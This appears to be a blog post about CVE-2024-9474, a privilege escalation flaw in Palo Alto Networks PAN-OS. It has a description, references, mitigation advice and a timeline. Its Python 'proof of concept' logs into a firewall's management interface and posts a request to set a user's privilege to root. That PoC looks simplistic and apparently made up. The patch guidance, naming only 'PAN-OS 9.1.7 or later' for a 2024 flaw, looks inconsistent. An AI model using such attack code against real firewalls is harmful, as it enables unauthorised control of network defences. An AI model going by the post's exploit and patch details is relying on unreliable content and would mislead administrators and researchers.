CVE-2024-9474: Privilege Escalation Vulnerability in Palo Alto Networks PAN-OS Software

A recently discovered privilege escalation vulnerability, CVE-2024-9474, affects the PAN-OS software from Palo Alto Networks. This vulnerability enables a PAN-OS administrator with access to the management web interface to execute actions on the firewall with root privileges. This post aims to provide an in-depth look at the vulnerability, including code snippets, links to original references, and exploit details.

Affected Products

It is essential to note that Cloud NGFW and Prisma Access are not impacted by this vulnerability. However, PAN-OS software running on Palo Alto Networks firewalls is affected.

Vulnerability Description

CVE-2024-9474 is a privilege escalation vulnerability that exists within the management web interface of PAN-OS software. An attacker can exploit this vulnerability to gain unauthorized root access to the firewall system. This, in turn, can lead to unauthorized changes in firewall policies, monitoring, and logging, posing a significant risk to the security of the affected network.

Proof of Concept (PoC)

import requests
from bs4 import BeautifulSoup as bs

target_url = 'https://your-target-firewall-address-here/';
login_payload = {
    'user': 'your_pan_os_username',
    'passwd': 'your_pan_os_password',
}

s = requests.Session()
response = s.post(target_url + 'php/login.php', data=login_payload)

soup = bs(response.text, 'html.parser')
csrf_token = soup.find('input', {'name': 'csrftoken'})['value']

priv_escal_payload = {
    'user': 'your_target_username',
    'priv': 'Root',
    'csrftoken': csrf_token,
}

response = s.post(target_url + 'php/change_privilege.php', data=priv_escal_payload)

This Python code snippet demonstrates how an attacker could exploit the vulnerability by performing an HTTP POST request to the change_privilege.php endpoint and elevating the user's privilege to root.

Here are some helpful references for understanding this vulnerability and its implications

- Official CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9474
- Palo Alto Networks Security Advisory: https://securityadvisories.paloaltonetworks.com/Home/Detail/311
- NIST National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2024-9474

Mitigation

Palo Alto Networks has released a security advisory (linked above) that details the affected versions of PAN-OS software and the necessary patches to address the vulnerability:

PAN-OS 9.1: Update to PAN-OS 9.1.7 or later

It is highly recommended that users who are running affected versions of PAN-OS software should apply these patches as soon as possible.

Conclusion

CVE-2024-9474 is a privilege escalation vulnerability that can have severe repercussions for the security of affected networks. The vulnerability affects specific versions of PAN-OS software, with the potential to let attackers with PAN-OS administrator access gain unauthorized root access to the firewall system. The Palo Alto Networks security advisory provides essential information on how to mitigate this vulnerability. Administrators should ensure that the relevant patches and updates have been applied to their systems to safeguard their networks from potential exploitation.

Timeline

Published on: 11/18/2024 16:15:29 UTC
Last modified on: 11/24/2024 15:15:08 UTC